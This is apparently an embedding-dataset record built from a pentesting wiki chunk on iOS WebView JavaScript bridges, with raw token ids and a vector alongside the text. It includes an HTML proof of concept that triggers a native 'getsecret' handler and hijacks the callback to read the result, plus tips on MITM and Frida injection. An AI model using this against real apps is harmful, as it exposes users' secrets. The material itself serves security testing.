[ 2024, 7686, 1999, 1996, 3128, 4044, 1012, 3602, 2008, 2069, 2465, 2372, 4225, 1999, 1996, 1046, 3366, 2595, 6442, 8778, 2024, 2081, 7801, 2000, 9262, 22483, 3642, 1012, 2298, 2041, 2005, 3642, 2008, 7341, 3128, 5200, 2000, 1996, 1046, 9363, 10111, 18413, 3378, 2007, 1037, 4773, 8584, 1998, 17908, 2054, 15380, 2009, 14451, 2015, 1010, 2005, 2742, 2053, 7591, 2951, 2323, 2022, 7801, 1998, 6086, 2000, 4773, 8584, 2015, 1012, 1999, 7863, 1011, 1039, 1010, 1996, 1046, 9363, 10111, 18413, 3378, 2007, 1037, 21318, 8545, 2497, 8584, 2003, 4663, 2004, 4076, 1024, 1031, 4773, 8584, 3643, 29278, 14839, 15069, 1024, 1030, 1000, 6254, 8584, 1012, 4773, 8584, 1012, 2364, 15643, 1012, 9262, 22483, 8663, 18209, 1000, 1033, 9262, 22483, 3642, 1999, 1037, 1059, 2243, 8545, 2497, 8584, 2064, 2145, 4604, 7696, 2067, 2000, 1996, 3128, 10439, 2021, 1999, 5688, 2000, 21318, 8545, 2497, 8584, 1010, 2009, 2003, 2025, 2825, 2000, 3495, 4431, 1996, 1046, 9363, 10111, 18413, 1997, 1037, 1059, 2243, 8545, 2497, 8584, 1012, 2612, 1010, 4807, 2003, 7528, 2478, 1037, 24732, 2291, 1998, 2478, 1996, 2695, 7834, 3736, 3351, 3853, 1010, 2029, 8073, 7642, 10057, 9262, 22483, 5200, 2046, 3128, 7863, 1011, 1039, 2030, 9170, 5200, 1012, 4471, 28213, 2015, 2024, 26928, 2478, 1996, 4118, 5587, 1006, 1035, 5896, 7834, 3736, 3351, 11774, 3917, 1024, 2171, 1024, 1007, 1012, 12067, 9262, 22483, 6374, 11263, 12273, 9585, 3900, 12044, 23235, 6374, 1006, 1035, 9124, 1024, 22017, 2140, 1007, 1063, 7047, 1035, 4487, 6593, 1031, 1000, 9262, 22483, 6374, 1000, 1033, 1029, 1012, 3643, 1027, 9124, 2292, 5310, 8663, 6528, 13535, 12162, 26611, 1027, 1059, 2243, 8545, 2497, 8584, 8663, 8873, 27390, 3370, 1012, 5310, 8663, 6528, 13535, 12162, 26611, 5310, 8663, 6528, 13535, 12162, 26611, 1012, 20362, 23235, 7834, 3736, 3351, 11774, 3917, 1006, 2005, 18442, 1024, 1000, 9262, 22483, 6374, 1000, 1007, 2065, 9124, 1063, 2292, 9262, 22483, 6374, 7834, 3736, 3351, 11774, 3917, 1027, 9262, 22483, 6374, 7834, 3736, 3351, 11774, 3917, 1006, 1007, 5310, 8663, 6528, 13535, 12162, 26611, 1012, 5587, 1006, 9262, 22483, 6374, 7834, 3736, 3351, 11774, 3917, 1010, 2171, 1024, 1000, 9262, 22483, 6374, 1000, 1007, 1065, 1065, 6016, 4471, 4215, 4667, 1037, 5896, 4471, 28213, 2007, 2171, 1000, 2171, 1000, 1006, 2030, 1000, 9262, 22483, 6374, 1000, 1999, 1996, 2742, 2682, 1007, 5320, 1996, 9262, 22483, 3853, 3332, 1012, 4773, 23615, 1012, 4471, 11774, 12910, 1012, 2026, 3900, 12044, 23235, 7834, 3736, 3351, 11774, 3917, 1012, 2695, 7834, 3736, 3351, 2000, 2022, 4225, 1999, 2035, 11048, 1999, 2035, 4773, 5328, 2008, 2224, 1996, 5310, 4180, 11486, 1012, 2009, 2064, 2022, 2059, 2109, 2013, 1996, 16129, 5371, 2066, 2023, 1024, 3853, 1999, 6767, 7520, 8082, 25918, 3370, 1006, 1007, 1063, 3643, 2487, 1027, 6254, 1012, 2131, 12260, 3672, 3762, 3593, 1006, 1000, 3643, 2487, 1000, 1007, 1012, 3643, 3643, 2475, 1027, 6254, 1012, 2131, 12260, 3672, 3762, 3593, 1006, 1000, 3643, 2475, 1000, 1007, 1012, 3643, 3332, 1012, 4773, 23615, 1012, 4471, 11774, 12910, 1012, 9262, 22483, 6374, 1012, 2695, 7834, 3736, 3351, 1006, 1031, 1000, 4800, 22086, 19172, 17198, 1000, 1010, 3643, 2487, 1010 ]
hack_tricks
435.txt
8
value2 ] ) ; } / / after testing the previos funtion i got the error typeerror : undefined is not an object ( evaluating'window. webkit. messagehandlers') / / but the following code worked to call the exposed javascriptbridge with the args " addnumbers ", " 1 ", " 2 " document. location = " javascriptbridge : / / addnumbers / " + 1 + " / " + 2once the native function es executed it usually will execute some javascript inside the web page ( see evaluatejavascript below ) you can be interested on overriding the function that is going to be executed to steal the result. for example, in the script below the function javascriptbridgecallback is going to be executed with 2 params ( the called function and the result ). if you control the html that is going to be loaded you can create an alert with the result like : < html > < script > document. location = " javascriptbridge : / / getsecret " function javascriptbridgecallback ( name, result ) { alert ( result ) ; } < / script > < / html > called functionthe called function resides in javascriptbridgemessagehandler. swift : class javascriptbridgemessagehandler : nsobject, wkscriptmessagehandler { / /... case " multiplynumbers " : let arg1 = double ( messagearray [ 1 ] )! let arg2 = double ( messagearray [ 2 ] )! result = string ( arg1 * arg2 ) / /... let javascriptcallback = " javascriptbridgecallback ('\ ( functionfromjs ) ','\ ( result )') " message. webview?. evaluatejavascript ( javascriptcallback, completionhandler : nil ) testingin order to test send a postmessage inside an application you can : change the servers response ( mitm ) perform a dynamic instrumentation and inject the javascript payload by using frameworks like frida and the corresponding javascript evaluation functions available for the ios webviews ( stringbyevaluatingjavascriptfromstring : for uiwebview and evaluatejavascript : completionhandler : for wkwebview ). debugging ios webviews ( tutorial from url ios
[ -0.12988600134849548, -0.008774927817285061, -0.8019415736198425, 0.09761430323123932, -0.15672333538532257, -0.05834682285785675, -0.7179773449897766, 0.27160540223121643, 0.8410912752151489, 0.5043289065361023, 0.5461450815200806, 0.3668108284473419, 0.08143265545368195, -0.466860830783844, -0.272602915763855, -0.09917846322059631, -1.0316779613494873, 0.005749701987951994, -1.0798701047897339, 0.30401715636253357, 0.4071577787399292, -0.25623610615730286, -1.1636161804199219, -0.8790035247802734, -0.8439145684242249, 0.38057181239128113, 1.040873646736145, -0.1426396369934082, 0.3336738049983978, 0.8292111754417419, 0.2788291275501251, -0.20549681782722473, -0.3975500762462616, -0.44520026445388794, 0.016483096405863762, -0.4568001925945282, 0.5005320906639099, 0.16117559373378754, 0.019974209368228912, -0.7222937345504761, 0.4884156584739685, -0.27438244223594666, -0.2710806429386139, -0.38181066513061523, -0.16920284926891327, -0.4124058783054352, 0.9727959036827087, -0.2683035433292389, 0.06257417798042297, -0.07629235833883286, 0.14836236834526062, 0.3276188373565674, -0.780047595500946, -0.13495147228240967, 0.15139977633953094, 0.28951793909072876, -0.021046152338385582, -0.5415664911270142, -0.532613217830658, 0.6032071113586426, 0.24961479008197784, 0.10953611880540848, 0.4056888222694397, -0.7335174679756165, -0.1403857171535492, 0.014986756257712841, 0.06970115751028061, 0.23531310260295868, 0.06542933732271194, -0.13206130266189575, -0.46980714797973633, 0.48619553446769714, -0.7328901290893555, -0.11247707158327103, -0.38071101903915405, 0.38649141788482666, -0.20781683921813965, 0.09720128774642944, 0.10580620914697647, 0.3476223051548004, -0.027932235971093178, 0.8044871091842651, -0.30506977438926697, 0.15532919764518738, -0.3349708318710327, -0.40925419330596924, 0.5850238800048828, 0.46057945489883423, -0.26540878415107727, -0.21971365809440613, 0.17316105961799622, 0.3064459264278412, -0.6344177722930908, 0.019743580371141434, 1.0307811498641968, 0.4551210105419159, -0.6084122061729431, 0.04774012416601181, -0.11290775239467621, -0.747826874256134, 1.0296460390090942, 0.7888087034225464, -0.22662600874900818, 0.5752797722816467, -0.5876691341400146, 0.4887101650238037, 0.48168832063674927, 0.09617643803358078, -0.14627498388290405, -0.5199275612831116, 0.48325595259666443, -0.043554965406656265, 0.2664168179035187, -0.37328776717185974, -0.20379690825939178, 0.5650259256362915, 0.2971952259540558, -0.094346784055233, -0.10820065438747406, 0.25234255194664, 0.5860410332679749, -0.6551994681358337, 0.40422096848487854, -0.04637308046221733, 0.4271284341812134, 0.250430166721344, 0.2918187975883484, 0.5517080426216125, -0.04210258647799492, 0.08477963507175446, -0.21605029702186584, 0.13843326270580292, -0.43252965807914734, 0.9610203504562378, -0.48125791549682617, 0.6656535863876343, -0.17333956062793732, 0.29461291432380676, 0.6820751428604126, -1.08851957321167, 0.19016976654529572, 0.6246140599250793, 0.33612728118896484, 1.2097835540771484, -0.25653475522994995, -0.5664216876029968, -0.67178875207901, 0.41891366243362427, -0.022251948714256287, 0.0915287584066391, -0.36086609959602356, 0.11298307776451111, 0.6920754313468933, -0.8019760847091675, -0.8809939026832581, -0.04674747958779335, -0.42868199944496155, 0.09625225514173508, 0.16247454285621643, -0.39773961901664734, -0.15731815993785858, 0.7160616517066956, -0.5883708000183105, -0.07906971126794815, -0.9283016920089722, 0.504689633846283, -0.5805719494819641, -0.5015701651573181, 0.4248717129230499, 0.26115524768829346, 0.33197256922721863, -0.35613831877708435, 0.19909794628620148, -0.11746294051408768, 1.6430808305740356, 0.7327166795730591, -0.04755999892950058, -0.14955098927021027, 0.39989137649536133, 0.16179081797599792, -0.1822168231010437, 1.2844293117523193, -0.26768219470977783, 1.1591671705245972, 0.016709404066205025, -0.1683332473039627, -0.11162910610437393, -0.36229607462882996, 0.5545874238014221, -0.3846742808818817, -0.23010654747486115, 0.6259866952896118, -0.6003044247627258, 0.5782786011695862, 0.1845676749944687, 0.746676504611969, -0.8730359673500061, 0.41027534008026123, -0.10870472341775894, -1.3378000259399414, -0.34395748376846313, 0.32462888956069946, 0.011634311638772488, 0.5778364539146423, -0.596471905708313, -0.007056858390569687, 0.8691093325614929, 0.12377717345952988, -0.7359035015106201, 1.1379592418670654, 0.15245050191879272, -0.05602515861392021, -0.1268523633480072, 0.2317124456167221, 0.309102863073349, 0.2237575352191925, -0.6458637714385986, -0.019685819745063782, 0.514145016670227, -0.49301326274871826, 0.05314216762781143, 0.2207115888595581, 0.3758821189403534, 0.9161416888237, -0.4939025938510895, -0.8102310299873352, 0.26183900237083435, 0.14569522440433502, -0.7814891338348389, -0.3774268627166748, 0.26929906010627747, 0.6535007953643799, 0.5914316773414612, 0.032395124435424805, -0.3482660949230194, -0.6240115761756897, 0.3281609117984772, 0.392754465341568, 0.12911538779735565, -0.49770477414131165, -0.006941285915672779, 0.8122559189796448, 0.6687161922454834, 0.4520467221736908, -0.2603154480457306, 0.05096759274601936, 0.26657846570014954, -0.34417015314102173, 0.060173265635967255, 1.4239273071289062, -0.08872225135564804, 0.9045057892799377, 0.7134590744972229, -0.24463790655136108, -0.9169679284095764, -0.2020317018032074, 0.4696040153503418, 0.5581843852996826, -0.3450179696083069, -0.5543507933616638, 0.18084488809108734, 0.13271190226078033, -0.46167275309562683, -0.8012491464614868, 0.3035344183444977, -0.17715074121952057, 0.34545254707336426, 0.6972610354423523, -0.5000786781311035, -1.1837387084960938, -0.9425562620162964, -0.5644189119338989, -0.6539430618286133, -0.7037637233734131, -1.1582670211791992, -0.3418055772781372, 0.3707966208457947, -0.3889368176460266, 0.48325780034065247, 0.16267120838165283, -0.6671746969223022, -0.4991972744464874, -0.117035411298275, 0.5920563340187073, 0.2601669728755951, 0.08044705539941788, -0.772774875164032, 0.4012904167175293, -0.28275781869888306, 1.0637941360473633, 0.21059611439704895, 0.062330298125743866, 0.3231874704360962, 0.6782503128051758, -0.35330477356910706, -0.21176208555698395, 0.9113632440567017, 0.1483694165945053, -0.36997032165527344, -0.13235676288604736, 0.27206340432167053, -0.07616185396909714, 0.31461119651794434, 0.42231446504592896, -0.41842901706695557, 0.6001834869384766, -0.1895156055688858, -0.547115683555603, 0.6022587418556213, 0.521493136882782, -0.2490820437669754, 0.2786092758178711, -0.21644370257854462, 0.5278996825218201, -0.3496454954147339, 0.45330551266670227, -0.08774963021278381, 0.10345521569252014, -0.1324838399887085, -0.4194806218147278, -0.03656003251671791, -0.4794544279575348, -0.4230707883834839, -0.2155047506093979, -0.19138580560684204, 0.6603896021842957, -0.7209544777870178, -0.7630850672721863, -0.07074403017759323, -0.3910946846008301, -0.10265307128429413, 0.24745550751686096, -0.18208344280719757, 0.6481534838676453, 0.6219680309295654, -0.26940321922302246, 0.36745685338974, -0.16491492092609406, -0.22048327326774597, 0.14468753337860107, 0.5221467614173889, -0.38666385412216187, 0.2765348553657532, 0.1550467610359192, 0.1018158346414566, 0.8624786734580994, 0.5018681883811951, -0.1263321340084076, 0.08522546291351318, -0.20905475318431854, -0.6916673183441162, -0.549964427947998, -0.35131123661994934, 0.2358371466398239, 0.3469671308994293, 0.5002139806747437, -0.1315792202949524, -0.5122893452644348, -0.06021569296717644, 0.32106080651283264, 0.6568247079849243, 0.41181498765945435, 0.32539790868759155, -0.21294009685516357, -0.5670872926712036, -0.013412307016551495, -0.2849595546722412, 0.0193566232919693, 0.39057788252830505, 0.17778590321540833, 0.305510550737381, 0.042686279863119125, -0.12074882537126541, 0.1760607659816742, -0.3325882852077484, -0.2926744818687439, 0.22214382886886597, -0.16173455119132996, 0.5395551919937134, 0.3331129848957062, -0.06006462499499321, -0.10325129330158234, 0.21460768580436707, 0.6198018193244934, 0.581850528717041, -0.20346753299236298, -0.6982203125953674, 0.08076858520507812, -0.3030225336551666, -0.05460582301020622, 0.4745783805847168, 0.07656501233577728, 0.4680958688259125, -0.47022491693496704, -0.210074320435524, -0.428581565618515, -0.12947481870651245, 0.43441149592399597, 0.1946050226688385, 0.29553285241127014, -0.1666049361228943, 0.1142333447933197, -0.27971351146698, 0.9906917810440063, -0.7250300645828247, 0.2926645576953888, -0.5017257332801819, 0.6971367597579956, 0.33593082427978516, 0.1729559600353241, 0.16311956942081451, -0.15251104533672333, 0.13343994319438934, -0.6901409029960632, 0.382957398891449, -0.34787020087242126, -0.28280332684516907, 0.154278963804245, 0.7530961036682129, 0.5959590077400208, -0.1713160127401352, -0.3544073700904846, -0.17401666939258575, -0.012498298659920692, 0.8437153697013855, -0.7022813558578491, 0.25758057832717896, -0.519621729850769, -0.015601995401084423, 0.7379464507102966, 0.07891584187746048, -0.18087714910507202, -0.6877943277359009, -0.6632577776908875, -0.5913457870483398, 0.3554762005805969, 0.39209121465682983, -0.17121541500091553, 0.12618637084960938, -1.089514136314392, -0.2943093776702881, 0.44279876351356506, 0.0809904932975769, -0.559086799621582, -0.38615813851356506, 0.29910290241241455, 0.012540077790617943, 0.47938376665115356, -0.9452589154243469, 0.39773285388946533, 0.2542516887187958, -0.7810059189796448, 0.6057655215263367, -0.33159059286117554, 0.35853058099746704, 0.37090960144996643, -0.0057859281077980995, 0.26516997814178467, 0.7654293775558472, -0.157435804605484, -0.11704687029123306, -0.43627676367759705, -0.041659098118543625, -0.3881687521934509, -0.47058045864105225, 0.7648202180862427, 0.5098027586936951, 0.08646645396947861, 0.18091389536857605, 0.6236301064491272, 0.3029566705226898, 0.17288322746753693, -0.4451307952404022, -0.3684872090816498, 0.41899874806404114, -0.2614002525806427, 0.6057350635528564, 0.20627814531326294, 0.23937639594078064, 0.19810998439788818, -0.5989612340927124, 0.3167513906955719, 0.17214874923229218, 0.2847822606563568, -1.1155859231948853, -0.5139117240905762, 0.1944938749074936, 0.18846631050109863, -0.2857663631439209, -0.08619274944067001, -0.26712673902511597, 0.4649527668952942, -0.1457599252462387, 0.3342030346393585, -0.5332445502281189, -1.0779680013656616, -0.376108855009079, 0.06550627201795578, -0.2397436499595642, -0.2402217835187912, 0.9092952013015747, -0.6393530368804932, -1.0703476667404175, 0.9947815537452698, -0.7109740972518921, 0.5061314702033997, -0.2868240475654602, -0.22339555621147156, -0.8717103004455566, 0.0838639885187149, -0.6371314525604248, 0.6042254567146301, -0.15176460146903992, 0.06655565649271011, -0.08195368945598602, 0.7695930600166321, 0.15061891078948975, 0.09286541491746902, -0.35750409960746765, 0.5831527709960938, -0.3008667826652527, -0.24268051981925964, -0.701683521270752, 0.48628970980644226, -0.6787546277046204, 0.11686710268259048, 0.028217390179634094, -0.2489701211452484, -1.189317226409912, -0.8836442828178406, 0.42861273884773254, 0.21307308971881866, 0.03990152105689049, -0.8525272011756897, -0.23903104662895203, 0.13476435840129852, 0.6803284883499146, -0.36353757977485657, -1.019851803779602, 0.11877749115228653, 0.21137619018554688, 0.12424813210964203, 0.01619480736553669, -0.11113037168979645, -0.13489161431789398, -0.5919451117515564, 0.25808387994766235, 0.4924600124359131, 0.7403433918952942, 0.08930287510156631, -0.3458311855792999, -0.225025475025177, 0.24852699041366577, 0.18490034341812134, -1.0745716094970703, -0.1934940367937088, 0.007355898153036833, -0.07913132756948471, -0.124773308634758, 0.4374130070209503, -0.29374396800994873, 0.11999749392271042, -0.14035020768642426, 0.09939006716012955, 0.1921107918024063, 0.400149405002594, 0.43298983573913574, -0.3324090838432312, 0.05610848218202591, -0.6885467171669006, -0.11044301837682724, 0.06050040200352669, 0.5430377721786499, -0.10520900785923004, -0.01677815057337284, -0.3347747325897217, -0.00411572027951479, -1.2753595113754272, -1.0429534912109375, 0.333903431892395, -0.08804937452077866, 0.16235364973545074, -0.32717928290367126, -0.2296259105205536, 0.9866711497306824, -0.6255269050598145, 0.6429136395454407, 0.7346897721290588, 0.5818547606468201, 0.7427465915679932, -0.6043468117713928, 0.5156226754188538, 0.32929572463035583, -0.354217529296875, 0.32349464297294617, 0.19898860156536102, 0.5192638039588928, -0.19063150882720947, 0.0633869394659996, -0.04457990080118179, -0.18491530418395996, 0.2671448588371277, -0.037243906408548355, -0.037063248455524445, 0.03180127218365669, -0.019073978066444397, -0.9741685390472412, -0.8275788426399231, 0.4845339357852936, 0.27233758568763733, -0.24048878252506256, 0.777553141117096, 0.3816215991973877, 0.24255695939064026, -0.02066894993185997, -0.1104523316025734, -0.3218071460723877, -0.3350941836833954, 0.5476188063621521, -0.3363640308380127, -0.29364243149757385, 0.8579563498497009, 0.15622499585151672, -1.2882798910140991, -0.33798274397850037, -0.3688288927078247, -0.2708609104156494, -0.21905829012393951, -0.44444766640663147, -0.7791550755500793, -0.2026757448911667, 0.3815827965736389, -0.25902411341667175, 0.08474937081336975, -0.1206798180937767, 0.07614322006702423, -0.5396735668182373, 0.16893763840198517, -0.3983944058418274, 0.8106194734573364, 1.039454460144043, -0.4882872998714447, -0.6416234970092773, -0.35611793398857117, 0.3197394907474518, 0.4098847210407257, -0.2534307837486267, 1.4852936267852783, -0.3381497263908386, 0.38924530148506165, 0.4031820297241211, 0.03167207911610603, 0.77378249168396, -0.23654450476169586, 0.05930507928133011, 1.1022603511810303, 0.09979674965143204, -0.6581056714057922, -0.2506020963191986, 0.13154268264770508, 0.4022638201713562, 0.4880300760269165, 0.1653575748205185, -0.1312139928340912, 0.29096803069114685, 0.8888025879859924, -0.4233562648296356, -0.5505428314208984, -0.8082029819488525, -0.8817651271820068, -0.36912354826927185, 0.18564334511756897, 0.49039342999458313, 0.10399339348077774, 0.16969603300094604, -0.10032112896442413, -0.16056710481643677, -0.09432175755500793, 0.0007505747489631176, -0.35090675950050354, 0.32679030299186707, -0.3133409917354584, 0.5292776823043823, -0.9462136626243591, -0.8749175071716309, -0.37785038352012634, -0.3265283405780792, -0.3318813741207123, -0.724632978439331, -0.7866906523704529, -0.15815721452236176, -0.1468019038438797, 0.0930100679397583, -0.9316256046295166, -0.08908965438604355, -0.23804256319999695, -1.131524920463562, 0.23313581943511963, 0.3774352967739105, -0.18322698771953583, 0.19692592322826385, -0.14909639954566956, -0.056760188192129135, -0.16260212659835815, -0.12930269539356232, -0.3642219007015228, 0.5843536853790283, 0.6761416792869568, -0.2566799521446228, 0.22382061183452606, -0.11674460023641586, 0.1935608834028244, 0.02662939578294754, -0.15082427859306335, -0.08365829288959503, -0.16056428849697113, 0.2706855535507202, 0.47861236333847046, 0.05288638919591904, 1.2164937257766724, 0.7955678701400757, 0.3175376057624817, 0.45255884528160095, -0.6125670075416565, 0.4164640009403229, 0.2116059511899948, -0.38629114627838135, -0.07556290924549103, -0.21264739334583282, 0.62093186378479, -0.6149953603744507, 0.24694256484508514, -0.11991586536169052, -0.07406697422266006, 0.5479402542114258, 0.05301066115498543, -0.08840640634298325, -0.7281494736671448, -0.6635129451751709, -0.13928839564323425, 0.32339799404144287, 0.4643130898475647, -0.29304566979408264, 0.7081097960472107, 0.5364105701446533, -0.8469839096069336, 0.44848790764808655, -0.9900791645050049, -0.2238677740097046, -0.03944714739918709, -0.7062336802482605, 0.33417633175849915, -0.10749732702970505, -0.05606290325522423, -0.6784390807151794, 0.18924278020858765, -0.4353439509868622, 0.04667767509818077, -0.12370564043521881, 0.2459736168384552, 0.9885748624801636, -0.8760111331939697, -0.7260313630104065, -0.18914532661437988, 0.6166622042655945, -1.0602656602859497, -0.7975119948387146, 0.40171706676483154, 0.710625410079956, 0.13404975831508636, -0.8415458798408508, -0.541368305683136, -0.2472379356622696, 0.36023572087287903, 0.5161017775535583, -0.35390499234199524, -0.40611758828163147, -1.2165913581848145, 0.5556538105010986, -0.851241409778595, 0.2185804396867752, 0.28974586725234985, 0.041503872722387314, 0.5907591581344604, -0.10468558967113495, -0.2810816466808319, 0.6798906326293945, 0.45971208810806274, -0.36064934730529785, 0.7691552042961121, 0.311892032623291, 0.21782343089580536, -0.5565900206565857, 0.20805679261684418, -0.24879291653633118, -0.1365007609128952, 0.44499513506889343, 0.7098252177238464, 0.49932947754859924, 0.31741926074028015, 0.44885191321372986, -0.5034480690956116, -0.29211750626564026, 0.2811683714389801, 0.252826988697052, -0.04871170595288277, -0.13955558836460114, -0.32823455333709717, 0.12229818850755692, 0.1573927253484726, -0.004449703264981508, -0.018908530473709106, 0.16952015459537506, 0.21893253922462463, -0.09619292616844177, -0.3700850009918213, 0.6262105107307434, -0.73756343126297, 0.24694837629795074, -0.29264122247695923, -0.2607651650905609, 0.5541976690292358, 0.1727936863899231, -0.47903817892074585, 1.059193730354309, 0.8554429411888123, 0.3200574815273285, -0.06027662009000778, 0.26697838306427, 0.17691613733768463, 0.32823848724365234, 0.13746377825737, -0.680551290512085, -0.1380428820848465, 0.09351471066474915, -0.10347987711429596, -0.7835593223571777, -0.4998502731323242, 0.5451428294181824, 0.7519983053207397, -0.28318408131599426, 0.15548816323280334, 0.16610203683376312, 0.1160225123167038, -0.4729766249656677, 0.3658025860786438, -0.16736885905265808, -0.10734874755144119, -0.09791690111160278, -0.23818670213222504, -0.9059520959854126, 0.9457318782806396, 0.16047403216362, 0.6179236769676208, 0.0001652897335588932, 1.0116292238235474, -0.7372949719429016, 0.76012122631073, -0.10892774164676666, -0.2987646460533142, -0.8725261688232422, 0.3881581127643585, -0.2522023916244507, -0.6007962226867676, -0.11844462156295776, -0.23830705881118774, -0.33054789900779724, 0.02751143090426922, -0.924403190612793, -1.1652889251708984, 0.01205942127853632, -0.3615267872810364, -1.028971791267395, 0.6959142684936523, 0.005091614555567503, -1.1470240354537964, 0.1403241753578186, -0.11711790412664413, 0.11682654917240143, 0.4434295892715454, -0.26196178793907166, -0.4427605867385864, -0.011285288259387016, -0.8787767887115479, 0.24404186010360718, 0.3930000066757202, -0.7222377061843872, -0.08984718471765518, 0.4235043525695801, -0.44677940011024475, -0.8161776065826416, -0.15475186705589294, 0.40390869975090027, -0.543669581413269, 0.6310621500015259, 0.4416385591030121, 0.8020710945129395, 0.49245738983154297, -0.3927828073501587, -0.18221023678779602, 0.4852766990661621, 0.12866823375225067, -0.325432687997818, 0.7598721385002136, 0.7993109226226807, -0.096687451004982, -0.03439471498131752, -0.556792140007019, 0.8658290505409241, -0.09318855404853821, -0.03461518511176109, -0.6776894330978394, 0.32038456201553345, -0.9997211694717407, -0.2906734347343445, 0.0005305372760631144, -0.12033084034919739, -0.23867619037628174, 0.1687629669904709, -1.2409764528274536, -0.009490701369941235, -0.4114745259284973, -0.06859605014324188, 0.18347139656543732, 0.2986292839050293, -0.21317151188850403, -0.3809780478477478, 0.8265988826751709, -0.8447139859199524, 4.328639984130859, 0.447086364030838, 0.06856067478656769, 0.19419245421886444, 0.3003535270690918, 0.7452032566070557, 0.5030665397644043, -0.7661149501800537, 0.20010170340538025, 0.06986548751592636, 0.4368084669113159, -0.25916773080825806, 0.22233161330223083, 0.7175827622413635, -0.013727410696446896, 0.2993529140949249, -0.6441208124160767, -0.45130258798599243, 0.29687631130218506, -1.281148076057434, -0.9982993602752686, 0.30556097626686096, -0.16122287511825562, 0.7332518696784973, 0.21128293871879578, 0.3809622526168823, -0.1267264038324356, -1.3098827600479126, -0.5876690149307251, -0.5182624459266663, 0.14294873178005219, 0.26120060682296753, 0.05218818783760071, 0.23638249933719635, -0.21949340403079987, 0.26630455255508423, -0.1580415666103363, -0.5047360062599182, -0.7467905282974243, 0.21931041777133942, 0.8295142650604248, 0.012149219401180744, -0.23010820150375366, -0.7677812576293945, 0.21229246258735657, -0.2443021982908249, -0.5965725779533386, 0.6823015809059143, 0.5227892398834229, -0.9003175497055054, 0.8178924322128296, -0.4800001382827759, 0.7955880761146545, -0.23254641890525818, -0.547473132610321, 0.17300090193748474, 0.26724451780319214, -0.16516569256782532, -0.21447186172008514, -0.1624349057674408, 1.0093649625778198, -0.7746819257736206, 0.23659811913967133, 0.08991584181785583, -1.1976799964904785, 0.4027922451496124, -0.4532719552516937, 0.3995809257030487, -0.5326460003852844, 0.44944944977760315, -0.6989448070526123, 0.04371577501296997, -0.6950185894966125, -0.5007737278938293, 1.0193510055541992, 0.3813333213329315, 0.10191266238689423, 0.16777564585208893, 0.6553269624710083, -0.5554080009460449, -0.054990578442811966, -0.04679040238261223, -0.8944356441497803, 0.35893771052360535, 0.9733874797821045, 0.7979852557182312, 0.1946984827518463, -0.5590283274650574, 0.07390906661748886, 0.49698612093925476, 0.37142783403396606, 0.6911442875862122, -0.3286469876766205, -0.130330428481102, 0.3375609815120697 ]
[ 3643, 2475, 1033, 1007, 1025, 1065, 1013, 1013, 2044, 5604, 1996, 3653, 25500, 2015, 4569, 3508, 1045, 2288, 1996, 7561, 2828, 2121, 29165, 1024, 6151, 28344, 2003, 2025, 2019, 4874, 1006, 23208, 1005, 3332, 1012, 4773, 23615, 1012, 4471, 11774, 12910, 1005, 1007, 1013, 1013, 2021, 1996, 2206, 3642, 2499, 2000, 2655, 1996, 6086, 9262, 22483, 6374, 2007, 1996, 12098, 5620, 1000, 5587, 19172, 17198, 1000, 1010, 1000, 1015, 1000, 1010, 1000, 1016, 1000, 6254, 1012, 3295, 1027, 1000, 9262, 22483, 6374, 1024, 1013, 1013, 5587, 19172, 17198, 1013, 1000, 1009, 1015, 1009, 1000, 1013, 1000, 1009, 1016, 2239, 3401, 1996, 3128, 3853, 9686, 6472, 2009, 2788, 2097, 15389, 2070, 9262, 22483, 2503, 1996, 4773, 3931, 1006, 2156, 16157, 3900, 12044, 23235, 2917, 1007, 2017, 2064, 2022, 4699, 2006, 2058, 21930, 1996, 3853, 2008, 2003, 2183, 2000, 2022, 6472, 2000, 8954, 1996, 2765, 1012, 2005, 2742, 1010, 1999, 1996, 5896, 2917, 1996, 3853, 9262, 22483, 6374, 9289, 20850, 8684, 2003, 2183, 2000, 2022, 6472, 2007, 1016, 11498, 5244, 1006, 1996, 2170, 3853, 1998, 1996, 2765, 1007, 1012, 2065, 2017, 2491, 1996, 16129, 2008, 2003, 2183, 2000, 2022, 8209, 2017, 2064, 3443, 2019, 9499, 2007, 1996, 2765, 2066, 1024, 1026, 16129, 1028, 1026, 5896, 1028, 6254, 1012, 3295, 1027, 1000, 9262, 22483, 6374, 1024, 1013, 1013, 4152, 8586, 13465, 1000, 3853, 9262, 22483, 6374, 9289, 20850, 8684, 1006, 2171, 1010, 2765, 1007, 1063, 9499, 1006, 2765, 1007, 1025, 1065, 1026, 1013, 5896, 1028, 1026, 1013, 16129, 1028, 2170, 3853, 10760, 2170, 3853, 11665, 1999, 9262, 22483, 6374, 7834, 3736, 3351, 11774, 3917, 1012, 9170, 1024, 2465, 9262, 22483, 6374, 7834, 3736, 3351, 11774, 3917, 1024, 24978, 16429, 20614, 1010, 1059, 5705, 23235, 7834, 3736, 3351, 11774, 3917, 1063, 1013, 1013, 1012, 1012, 1012, 2553, 1000, 4800, 22086, 19172, 17198, 1000, 1024, 2292, 12098, 2290, 2487, 1027, 3313, 1006, 4471, 2906, 9447, 1031, 1015, 1033, 1007, 999, 2292, 12098, 2290, 2475, 1027, 3313, 1006, 4471, 2906, 9447, 1031, 1016, 1033, 1007, 999, 2765, 1027, 5164, 1006, 12098, 2290, 2487, 1008, 12098, 2290, 2475, 1007, 1013, 1013, 1012, 1012, 1012, 2292, 9262, 22483, 9289, 20850, 8684, 1027, 1000, 9262, 22483, 6374, 9289, 20850, 8684, 1006, 1005, 1032, 1006, 3853, 19699, 5358, 22578, 1007, 1005, 1010, 1005, 1032, 1006, 2765, 1007, 1005, 1007, 1000, 4471, 1012, 4773, 8584, 1029, 1012, 16157, 3900, 12044, 23235, 1006, 9262, 22483, 9289, 20850, 8684, 1010, 6503, 11774, 3917, 1024, 9152, 2140, 1007, 5604, 2378, 2344, 2000, 3231, 4604, 1037, 2695, 7834, 3736, 3351, 2503, 2019, 4646, 2017, 2064, 1024, 2689, 1996, 14903, 3433, 1006, 10210, 2213, 1007, 4685, 1037, 8790, 16015, 1998, 1999, 20614, 1996, 9262, 22483, 18093, 2011, 2478, 7705, 2015, 2066, 10424, 8524, 1998, 1996, 7978, 9262, 22483, 9312, 4972, 2800, 2005, 1996, 16380, 4773, 8584, 2015, 1006, 5164, 3762, 13331, 7630, 5844, 3900, 12044, 23235, 19699, 22225, 18886, 3070, 1024, 2005, 21318, 8545, 2497, 8584, 1998, 16157, 3900, 12044, 23235, 1024, 6503, 11774, 3917, 1024, 2005, 1059, 2243, 8545, 2497, 8584, 1007, 1012, 2139, 8569, 12588, 16380, 4773, 8584, 2015, 1006, 14924, 4818, 2013, 24471, 2140, 16380 ]
hack_tricks
435.txt
9
